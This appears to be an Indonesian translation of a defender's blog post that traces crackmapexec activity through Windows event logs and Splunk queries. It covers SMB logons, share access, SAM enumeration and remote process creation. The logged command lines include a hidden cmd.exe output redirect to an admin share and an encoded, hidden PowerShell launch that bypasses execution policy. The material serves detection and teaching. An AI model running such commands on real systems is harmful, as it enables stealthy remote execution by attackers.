Pada postingan sebelumnya, kita melihat crackmapexec dari sudut pandang penyerang. Dari sudut pandang defender, pertama-tama mari kita lihat log yang dihasilkan saat crackmapexec dijalankan di jaringan kita. Karena salah satu perangkat dikonfigurasi agar lognya diteruskan ke Splunk, kami dapat melihat informasi pelaporan host tentang pemindaian awal. Itu juga berarti, sementara beberapa perangkat berada di jaringan ini, tidak semua dikonfigurasi untuk meneruskan log mereka ke solusi logging terpusat. Ini biasanya berlaku untuk perangkat dalam jaringan produksi.
04/07/2019 11:08:41 PM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=3 EventType=4 Type=Information ComputerName=SECNIK-2K19.securitynik.local User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=Network connection detected (rule: NetworkConnect) OpCode=Info RecordNumber=12826 Keywords=None Message=Network connection detected: RuleName: UtcTime: 2019-04-08 06:08:40.639 ProcessGuid: {48be9e4e-df2a-5caa-0000-0010eb030000} ProcessId: 4 Image: System User: NT AUTHORITYSYSTEM Protocol: tcp Initiated: false SourceIsIpv6: false SourceIp: 10.0.0.105 SourceHostname: SECNIK-2K19.securitynik.local SourcePort: 445 SourcePortName: microsoft-ds DestinationIsIpv6: false DestinationIp: 10.0.0.100 DestinationHostname: DestinationPort: 34564 DestinationPortName:
Dari atas, kita melihat contoh pelaporan Sysmon bahwa koneksi jaringan terdeteksi dari host di “10.00.0.105” berkomunikasi pada port sumber “445” ke IP tujuan “10.0.0.100” pada port “34564”.
Seperti yang kita lihat di bawah, kita melihat contoh share yang sedang diakses:
04/08/2019 06:19:50 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=43571 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x5B3EF6 Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 35710 Share Information: Share Name: \*SYSVOL Share Path: ??C:WindowsSYSVOLsysvol Relative Target Name: LusqPJemAo Access Request Information: Access Mask: 0x110080 Accesses: DELETE SYNCHRONIZE ReadAttributes Access Check Results: DELETE: Granted by D:(A;;FA;;;BA) SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;WD) ReadAttributes: Granted by D:(A;;0x1200a9;;;WD)
Mari kita lihat lebih baik bagian-bagian ini diakses melalui gambar. Berikut adalah filter yang saya gunakan di Splunk untuk melihat data ini:
* NOT "Files\SplunkUniversalForwarder" NOT "0:0:0:0:0:0:0:1" NOT "127.0.0.1" NOT "fe80:0:0:0:89f9:808e:8310:538e" NOT "Resource Assignment" NOT "224.0.0.252" "10.0.0.100" | stats count by Source_Address,Source_Port,ComputerName,Account_Name,Logon_ID,Security_ID,TaskCategory,Share_Name,Share_Path,Relative_Target_Name
Saat kita melihat enumerasi pengguna, kita melihat peristiwa pertama di mana firewall mengizinkan koneksi ke host pada 10.0.0.105
04/09/2019 06:08:41 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5156 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Filtering Platform Connection OpCode=Info RecordNumber=53458 Keywords=Audit Success Message=The Windows Filtering Platform has permitted a connection. Application Information: Process ID: 4 Application Name: System Network Information: Direction: Inbound Source Address: 10.0.0.100 Source Port: 36662 Destination Address: 10.0.0.105 Destination Port: 445 Protocol: 6 Filter Information: Filter Run-Time ID: 0 Layer Name: Receive/Accept Layer Run-Time ID: 44
Setelah izin firewall, kita dapat melihat “Administrator” telah berhasil masuk
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=53461 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 36662 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128 This event is generated when a logon session is created. It is generated on the computer that was accessed.
Selanjutnya kita melihat akun “Administrator” dengan alamat IP sumber 10.0.0.100 mengakses nama share “\*IPC$”
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5140 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=File Share OpCode=Info RecordNumber=53462 Keywords=Audit Success Message=A network share object was accessed. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 36662 Share Information: Share Name: \*IPC$ Share Path: Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory)
Setelah share diakses, kami melihat di bawah bahwa izin sedang diperiksa pada share
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=53463 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 36662 Share Information: Share Name: \*IPC$ Share Path: Relative Target Name: samr Access Request Information: Access Mask: 0x3 Accesses: ReadData (or ListDirectory) WriteData (or AddFile) Access Check Results: -
Kami selanjutnya melihat pegangan yang diminta ke suatu objek. Perhatikan ini ditangani oleh proses “lsass.exe”. Dari bawah, kita dapat menyimpulkan bahwa akun pada sistem sedang terdaftar. Pegangan yang diminta dapat berupa objek Active Directory atau objek SAM. Karena perangkat ini menjalankan Windows 2019, kami menyimpulkan ini akan didasarkan pada Objek Direktori Aktif.
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4661 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=SAM OpCode=Info RecordNumber=53464 Keywords=Audit Success Message=A handle to an object was requested. Subject : Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Object: Object Server: Security Account Manager Object Type: SAM_DOMAIN Object Name: DC=securitynik,DC=local Handle ID: 0x2555508d260 Process Information: Process ID: 0x22c Process Name: C:WindowsSystem32lsass.exe Access Request Information: Transaction ID: {00000000-0000-0000-0000-000000000000} Accesses: DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts Access Reasons: - Access Mask: 0xF01FD Privileges Used for Access Check: - Properties: --- {19195a5a-6da0-11d0-afd3-00c04fd930c9} DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts {c7407360-20bf-11d0-a768-00aa006e0529} {bf9679a4-0de6-11d0-a285-00aa003049e2} {bf9679a5-0de6-11d0-a285-00aa003049e2} {bf9679a6-0de6-11d0-a285-00aa003049e2} {bf9679bb-0de6-11d0-a285-00aa003049e2} {bf9679c2-0de6-11d0-a285-00aa003049e2} {bf9679c3-0de6-11d0-a285-00aa003049e2} {bf967a09-0de6-11d0-a285-00aa003049e2} {bf967a0b-0de6-11d0-a285-00aa003049e2} {b8119fd0-04f6-4762-ab7a-4986c76b3f9a} {bf967a34-0de6-11d0-a285-00aa003049e2} {bf967a33-0de6-11d0-a285-00aa003049e2} {bf9679c5-0de6-11d0-a285-00aa003049e2} {bf967a61-0de6-11d0-a285-00aa003049e2} {bf967977-0de6-11d0-a285-00aa003049e2} {bf96795e-0de6-11d0-a285-00aa003049e2} {bf9679ea-0de6-11d0-a285-00aa003049e2} {ab721a52-1e2f-11d0-9819-00aa0040529b} Restricted SID Count: 0
Demikian pula, kami melihat permintaan lain untuk pegangan ini. Namun, kali ini, perhatikan itu adalah daftar grup. Catatan serupa dengan di atas, informasi tambahan sedang diambil. Berbagai properti set GUID mewakili item yang berbeda.
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4661 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=SAM OpCode=Info RecordNumber=53465 Keywords=Audit Success Message=A handle to an object was requested. Subject : Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Object: Object Server: Security Account Manager Object Type: SAM_USER Object Name: S-1-5-21-4078604576-3869073289-8028338-500 Handle ID: 0x2555508e5a0 Process Information: Process ID: 0x22c Process Name: C:WindowsSystem32lsass.exe Access Request Information: Transaction ID: {00000000-0000-0000-0000-000000000000} Accesses: DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadGeneralInformation ReadPreferences WritePreferences ReadLogon ReadAccount WriteAccount SetPassword (without knowledge of old password) ListGroups Access Reasons: - Access Mask: 0xF01BF Privileges Used for Access Check: - Properties: --- {bf967aba-0de6-11d0-a285-00aa003049e2} DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadGeneralInformation ReadPreferences WritePreferences ReadLogon ReadAccount WriteAccount SetPassword (without knowledge of old password) ListGroups {59ba2f42-79a2-11d0-9020-00c04fc2d3cf} {bf967938-0de6-11d0-a285-00aa003049e2} {5fd42471-1262-11d0-a060-00aa006c33ed} {bf9679e8-0de6-11d0-a285-00aa003049e2} {bf967a00-0de6-11d0-a285-00aa003049e2} {3e0abfd0-126a-11d0-a060-00aa006c33ed} {bf967a6a-0de6-11d0-a285-00aa003049e2} {bf967953-0de6-11d0-a285-00aa003049e2} {4c164200-20c0-11d0-a768-00aa006e0529} {bf967915-0de6-11d0-a285-00aa003049e2} {bf967a0a-0de6-11d0-a285-00aa003049e2} {bf967a68-0de6-11d0-a285-00aa003049e2} {bf967a6d-0de6-11d0-a285-00aa003049e2} {5f202010-79a5-11d0-9020-00c04fc2d4cf} {bf96792e-0de6-11d0-a285-00aa003049e2} {bf967985-0de6-11d0-a285-00aa003049e2} {bf967986-0de6-11d0-a285-00aa003049e2} {bf967996-0de6-11d0-a285-00aa003049e2} {bf967997-0de6-11d0-a285-00aa003049e2} {bf9679aa-0de6-11d0-a285-00aa003049e2} {bf9679ab-0de6-11d0-a285-00aa003049e2} {bf9679ac-0de6-11d0-a285-00aa003049e2} {bf967a05-0de6-11d0-a285-00aa003049e2} {bf9679a8-0de6-11d0-a285-00aa003049e2} {e48d0154-bcf8-11d1-8702-00c04fb96050} {bf967950-0de6-11d0-a285-00aa003049e2} {bc0ac240-79a9-11d0-9020-00c04fc2d4cf} {bf967991-0de6-11d0-a285-00aa003049e2} {ab721a53-1e2f-11d0-9819-00aa0040529b} {00299570-246d-11d0-a768-00aa006e0529} {7ed84960-ad10-11d0-8a92-00aa006e0529} Restricted SID Count: 0
Sekarang mari kita lihat seperti apa log untuk melihat bagaimana kita mungkin dapat menemukan ketika permintaan dibuat untuk menghitung kebijakan kata sandi
04/17/2019 08:11:15 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4661 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=SAM OpCode=Info RecordNumber=150020 Keywords=Audit Success Message=A handle to an object was requested. Subject : Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x55E205 Object: Object Server: Security Account Manager Object Type: SAM_DOMAIN Object Name: DC=securitynik,DC=local Handle ID: 0x1fa0565e940 Process Information: Process ID: 0x234 Process Name: C:WindowsSystem32lsass.exe Access Request Information: Transaction ID: {00000000-0000-0000-0000-000000000000} Accesses: DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts Access Reasons: - Access Mask: 0xF01FD Privileges Used for Access Check: - Properties: --- {19195a5a-6da0-11d0-afd3-00c04fd930c9} DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts {c7407360-20bf-11d0-a768-00aa006e0529} {bf9679a4-0de6-11d0-a285-00aa003049e2} {bf9679a5-0de6-11d0-a285-00aa003049e2} {bf9679a6-0de6-11d0-a285-00aa003049e2} {bf9679bb-0de6-11d0-a285-00aa003049e2} {bf9679c2-0de6-11d0-a285-00aa003049e2} {bf9679c3-0de6-11d0-a285-00aa003049e2} {bf967a09-0de6-11d0-a285-00aa003049e2} {bf967a0b-0de6-11d0-a285-00aa003049e2} {b8119fd0-04f6-4762-ab7a-4986c76b3f9a} {bf967a34-0de6-11d0-a285-00aa003049e2} {bf967a33-0de6-11d0-a285-00aa003049e2} {bf9679c5-0de6-11d0-a285-00aa003049e2} {bf967a61-0de6-11d0-a285-00aa003049e2} {bf967977-0de6-11d0-a285-00aa003049e2} {bf96795e-0de6-11d0-a285-00aa003049e2} {bf9679ea-0de6-11d0-a285-00aa003049e2} {ab721a52-1e2f-11d0-9819-00aa0040529b} Restricted SID Count: 0
Di atas mencerminkan kebijakan kata sandi yang diminta (bersama dengan parameter domain lainnya). Lihat bagian referensi untuk tautan mereka untuk menerjemahkan nilai.
Sekarang mari kita lihat seperti apa komunikasi saat crackmapexec menjalankan perintah powershell.
Untuk membantu kita memahami koneksi yang dibuat, mari kita lihat beberapa statistik melalui Splunk. Secara khusus, bersama dengan beberapa informasi penting, mari kita identifikasi sesi masuk yang berbeda. Kami dapat melacak ini melalui bidang “Logon_ID” seperti yang ditunjukkan di bawah ini.
* NOT("splunk" OR "activedirectory.webservices.exe" OR "::1" OR "127.0.0.1" OR Protocol=17) | stats count by Source_Address,Source_Port,Logon_ID,Account_Name,Share_Name Source_Address Source_Port Logon_ID Account_Name Share_Name count 10.0.0.100 53494 0xB48A3E Administrator \*C$ 21 10.0.0.100 53496 0xB48A64 Administrator \*IPC$ 2 fe80::89f9:808e:8310:538e 56096 0xB4D870 SECNIK-2K19$ \*SYSVOL 2 fe80::89f9:808e:8310:538e 56100 0xB5543B SECNIK-2K19$ \*SYSVOL 3 fe80::89f9:808e:8310:538e 56103 0x3E4 SECNIK-2K19$ \*IPC$ 1
Dari informasi di atas, sepertinya sesi pertama adalah sesi tersibuk. Mari kita lihat sesi itu untuk melihat apa yang bisa kita temukan.
Menggunakan filter yang berfokus pada Logon_ID “0xB48A3E”, kita melihat yang berikut:
04/18/2019 01:32:43 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=172526 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 53494 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128
Di atas kita melihat pengguna “Administrator” berhasil masuk dari “10.0.0.100:53494” dan diberi ID masuk “0xB48A3E”.
Kami kemudian melihat di bawah bahwa nama berbagi “\*C$” diakses melalui tindakan baca (atau daftar direktori).
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5140 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=File Share OpCode=Info RecordNumber=172553 Keywords=Audit Success Message=A network share object was accessed. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \*C$ Share Path: ??C: Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory)
Selanjutnya kita lihat di bawah objek “WindowsTempkJpSGP” diperiksa untuk melihat apakah akses ReadData dapat diberikan ke target “WindowsTempkJpSGP”
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172554 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \*C$ Share Path: ??C: Relative Target Name: WindowsTempkJpSGP Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory) Access Check Results:
Selanjutnya di bawah, kita melihat upaya lain untuk memeriksa apakah akses dapat diberikan. Kali ini ke “WindowsTempkJpSGP”
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172568 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \*C$ Share Path: ??C: Relative Target Name: WindowsTempkJpSGP Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory) Access Check Results:
Mengikuti acara di atas, kita melihat di bawah bahwa pemeriksaan telah dilakukan untuk melihat apakah ada izin yang diperlukan untuk menghapus file di atas.
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172570 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \*C$ Share Path: ??C: Relative Target Name: WindowsTempkJpSGP Access Request Information: Access Mask: 0x10080 Accesses: DELETE ReadAttributes Access Check Results:
Mirip dengan di atas, ada sejumlah pemeriksaan ini untuk melihat apakah izin yang diperlukan sudah ada. Namun, demi kepentingan ruang dan waktu, saya memilih untuk tidak memasukkan mereka ke dalam analisis ini.
Akhirnya, akun ini keluar seperti yang ditunjukkan di bawah ini.
04/18/2019 01:32:47 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4634 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logoff OpCode=Info RecordNumber=172610 Keywords=Audit Success Message=An account was logged off. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Logon Type: 3
Sekarang mari kita lihat apa yang terjadi dengan ID masuk “0xB48A64” yang dikaitkan dengan IP 10.0.0.100.
04/18/2019 01:32:43 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=172530 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A64 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 53496 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128
Di atas kita melihat logon yang pada akhirnya diikuti oleh logon seperti gambar di bawah ini.
04/18/2019 01:32:47 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4634 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logoff OpCode=Info RecordNumber=172609 Keywords=Audit Success Message=An account was logged off. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A64 Logon Type: 3
Pada titik ini kesimpulan saya adalah bahwa kami melewatkan sesuatu dalam analisis kami. Ini pasti karena filter awal kami. Meskipun filter itu membantu kami mendeteksi beberapa aktivitas, itu tidak membantu kami menemukan di mana perintah powershell yang sebenarnya dieksekusi. Mari kita mundur sejenak dan melihat antara waktu masuk dan keluar di atas untuk melihat apakah kita bisa mendapatkan wawasan yang lebih baik tentang apa yang mungkin terjadi selama waktu itu.
Saat saya menelusuri log, saya melihat ID masuk yang tidak tertangkap oleh filter saya sebelumnya. ID Masuk baru ini adalah “0xB48AC1”. Anda mungkin juga memperhatikan bahwa port “10.0.0.100:37794” tidak ada dalam filter kami di atas. Mungkin kita melewatkan sesuatu. Semoga kelalaian saya di atas membantu Anda memahami betapa mudahnya kehilangan bukti penting.
Di bawah ini kita melihat bahwa akun berhasil masuk
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=172543 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 37794 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128
Sekarang kita memiliki ID Masuk baru “0xB48AC1”, kita dapat mengatur filter untuk fokus pada aktivitas yang dilakukan oleh ID Masuk ini. Mari kita maju untuk melihat apa yang bisa kita temukan relevansinya.
Segera setelah masuk, kita melihat di bawah akun “Administrator” menggunakan ID Masuk “0xB48AC1” membuat proses baru untuk “cmd.exe”. Saat kita melihat “Process Command Line” di bawah ini, kita melihat dengan menarik bahwa file “WindowsTempkJpSGP” yang kami rujuk di atas dan yang sedang dilakukan pemeriksaan izin sedang digunakan. Saya menemukan baris perintah ini menarik, jadi mari kita uraikan.
Pada dasarnya di bawah ini, argumen untuk “cmd.exe” adalah sebagai berikut:
/Q – Mematikan gema
/c – Menjalankan perintah yang ditentukan oleh string dan kemudian berakhir
cd – mengatakan untuk beralih ke direktori root dalam hal ini C: kemungkinan besar
1> – ambil apa pun dari output dari perintah sebelumnya dan kirimkan ke ….
… \127.0.0.1C$WindowsTempkJpSGP – File tempat konten pengalihan harus dikirim jika ada
2>&1 – Ambil kesalahan yang mungkin terjadi dan kirimkan ke tempat standar keluar yaitu ke file “kJpSGP”
Sekarang kita tahu tentang apa perintah itu, mari kita lanjutkan.
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=172550 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Process Information: New Process ID: 0xe00 New Process Name: C:WindowsSystem32cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x12cc Creator Process Name: C:WindowsSystem32wbemWmiPrvSE.exe Process Command Line: cmd.exe /Q /c cd 1> \127.0.0.1C$WindowsTempkJpSGP 2>&1
Kami kemudian melihat proses “cmd.exe” di atas, sekarang membuat di bawah proses “conhost.exe”.
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=172551 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1040 New Process Name: C:WindowsSystem32conhost.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xe00 Creator Process Name: C:WindowsSystem32cmd.exe Process Command Line: ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1
Selanjutnya kita lihat di bawah pada localhost (127.0.0.1), beberapa aktivitas yang dilakukan oleh ID masuk “0xB48AC1”. Secara khusus kami melihat upaya untuk memeriksa untuk melihat apakah ada izin yang cukup atau tidak untuk “Hak untuk membaca informasi dalam deskripsi keamanan objek”, “Hak untuk menggunakan objek untuk sinkronisasi”, “hak untuk menulis data ke file “, “Hak untuk menambahkan data ke file”, “Hak untuk menulis atribut file yang diperluas”, “Hak untuk membaca atribut file” dan terakhir “Hak untuk menulis atribut file.”
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172566 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Network Information: Object Type: File Source Address: 127.0.0.1 Source Port: 56094 Share Information: Share Name: \*C$ Share Path: ??C: Relative Target Name: WindowsTempkJpSGP Access Request Information: Access Mask: 0x120196 Accesses: READ_CONTROL SYNCHRONIZE WriteData (or AddFile) AppendData (or AddSubdirectory or CreatePipeInstance) WriteEA ReadAttributes WriteAttributes Access Check Results:
Akhirnya, setelah melihat beberapa aktivitas tambahan (yang telah saya kecualikan untuk singkatnya), kami melihat skrip PowerShell dieksekusi oleh proses “cmd.exe”. Harap dicatat, ini bukan “cmd.exe” yang sama dari atas, tetapi aktivitas ini semuanya terkait. Hanya saja “cmd.exe” lain telah dibuat dan saya tidak melihat gunanya kembali untuk menampilkan informasi yang sudah ditunjukkan di atas. Jika Anda memiliki kekhawatiran tentang ini, jangan ragu untuk menghubungi saya.
Saat kita melihat baris perintah di bawah ini, kita melihat apa yang tampaknya menjadi PowerShell yang sedang dieksekusi. Namun, kami tidak dapat membaca isinya saat ini.
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=172584 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Process Information: New Process ID: 0xa74 New Process Name: C:WindowsSystem32cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x12cc Creator Process Name: C:WindowsSystem32wbemWmiPrvSE.exe Process Command Line: cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded 